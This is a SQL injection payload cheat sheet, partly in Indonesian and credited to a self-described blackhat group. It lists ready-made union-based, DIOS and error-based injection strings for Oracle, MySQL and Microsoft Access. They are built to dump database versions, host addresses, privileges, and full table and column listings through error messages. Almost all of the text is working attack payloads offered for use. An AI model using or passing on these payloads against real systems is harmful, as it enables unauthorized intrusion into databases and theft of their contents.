MYSQL | SYBASE | POSTGRESQL | IBM DB2 | ORACLE | SQLITE | INFORMIX | FIREBIRD | MICROSOFT ACCESS | MICROSOFT SQL SERVER [MSSQL] | PHPMYWIND [MYSQL]
Re-Upload : 14 Juli 2022
========================
@Arjuna Dewangga
@Javanese BlackHat ID 14
========================
Credit : all Dewangga
Credit : PostgreSQL : Chaplin
SQLI UNION BASED :
– ORACLE SQL INJECTION
– POSTGRESQL INJECTION
– SQLITE INJECTION
– SYBASE INJECTION
– MICROSOFT SQL SERVER INJECTION ( MSSQL Injection )
– MICROSOFT ACCESS INJECTION
– IBM DB2 INJECTION
=================================
# DIOS ( Dump In One Shot ) MICROSOFT ACCESS
and 1=0 UNION SELECT 1,2,3,4 from MSysAccessObjects
atau gunakan table/columns biasanya ( Microsoft access )
# DIOS ( ORACLE )
concat(‘DEW’,’%3cimg src=”link img” height=”290″ width=”290″%3e’||’%3cbr%3e’||’%3cli%3e’||’PRINT SYSTEM’||’%3cli%3e’||’VERSION :: ‘||(SELECT BANNER from V$version where rownum=1)||’%3cli%3e’||’DATABASE :: ‘||SYS.DATABASE_name||’%3cli%3e’||’ HostName IP Address :: ‘||’%3cbr%3e’||’ %3e%3e%3e ‘||UTL_INADDR.get_host_address||’%3cbr%3e’||’ %3e%3e%3e ‘||(SELECT host_name FROM v$instance where rownum=1)||’%3cbr%3e’||’ %3e%3e%3e ‘||UTL_INADDR.get_host_name||’%3cli%3e’||’USER :: ‘||user||’%3cli%3e’||’DB FILLES :: ‘||(SELECT name FROM V$DATAFILE where rownum=1)||’%3cli%3e’||’PRIVILEGES :: ‘||(SELECT grantee FROM dba_sys_privs where rownum=1)||’%3cli%3e’||’SERVER OPERATING SYSTEM :: ‘||(select member from v$logfile where rownum=1)||’%3cli%3e’||’THE SERVER SID :: ‘||(select instance_name from v$instance)||’%3cbr%3e’||’%3cbr%3e’||’%3cli%3e’||’DUMP DB’||’%3cbr%3e’||(select wm_concat(‘%3cli%3e’||table_name||’ %3e%3e%3e ‘||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum%3c167))||’%3c!–‘
From Dual
ENCODE/DECODE = CHR
Jika tidak bisa WM_CONCAT ganti dengan LISTAGG
or 1=utl_inaddr.get_host_name(CHR(60)||CHR(98)||CHR(114)||CHR(62)||user||CHR(60)||CHR(98)||CHR(114)||CHR(62)||sys.database_name||CHR(60)||CHR(98)||CHR(114)||CHR(62)||(select banner from v%24version where rownum=1)||CHR(60)||CHR(98)||CHR(114)||CHR(62)||(select wm_concat(CHR(60)||CHR(108)||CHR(105)||CHR(62)||table_name||CHR(32)||CHR(62)||CHR(62)||CHR(62)||CHR(32)||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum%3c25))
(select LISTAGG(CHR(60)||CHR(108)||CHR(105)||CHR(62)||table_name||CHR(32)||CHR(62)||CHR(62)||CHR(62)||CHR(32)||column_name) within group (ORDER BY table_name) from all_tab_columns where rownum%3c25)
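ERROR BASED ( ORACLE ) : the subquery result comes back inside the database error message, so these depend on the application showing raw Oracle errors to the client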
And 1=UTL_INADDR.GET_HOST_NAME((select banner from v$version where rownum=1))%3b
And 1=UTL_INAADR.GET_HOST_ADDRESS((select banner from v$version where rownum=1))%3b
And 1=ORDSYS.ORD_DICOM.GETMAPPINGXPATH((select banner from v$version where rownum=1),user,user)%3b
and 1=CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))%3b
and 1= and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null —
And 1=and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null —
And 1=and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null —
And 1=and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null —
And 1=and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null —
And 1= and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)–
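# DIOS ERROR BASED MYSQL ( the queried value comes back inside the MySQL error message, so these depend on the application showing raw database errors to the client )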
1.updatexml()
select %2a from users where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))%3b
2.extractvalue()
select %2a from users where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))%3b
3.exp()
select %2a from users where id=1 and exp(%7e(select %2a from(select user())a))%3b
4.geometrycollection()
select %2a from users where id=1 and geometrycollection((select %2a from(select %2a from(select user())a)b))%3b
5.multipoint()
select %2a from users where id=1 and multipoint((select %2a from(select %2a from(select user())a)b))%3b
6.polygon()
select %2a from users where id=1 and polygon((select %2a from(select %2a from(select user())a)b))%3b
7.multipolygon()
select %2a from users where id=1 and multipolygon((select %2a from(select %2a from(select user())a)b))%3b
8.linestring()
select %2a from users where id=1 and linestring((select %2a from(select %2a from(select user())a)b))%3b
9.multilinestring()
select %2a from users where id=1 and multilinestring((select %2a from(select %2a from(select user())a)b))%3b
10.floor
select %2a from users where id=1 and (select 1 from (select count(%2a),concat(user(),floor(rand(0)%2a2))x from information_schema.tables group by x)a)%3b
11.PROCEDURE ANALYSE
+PROCEDURE ANALYSE+(EXTRACTVALUE(0,CONCAT(0x27,0x3a,@@VERSION)),1)
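# Ket : Decode URL ( payload di atas masih URL-encoded : %2a = * , %3b = ; , %7e = ~ , %7c = | , %24 = $ , %3c = < , %3e = > )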
===============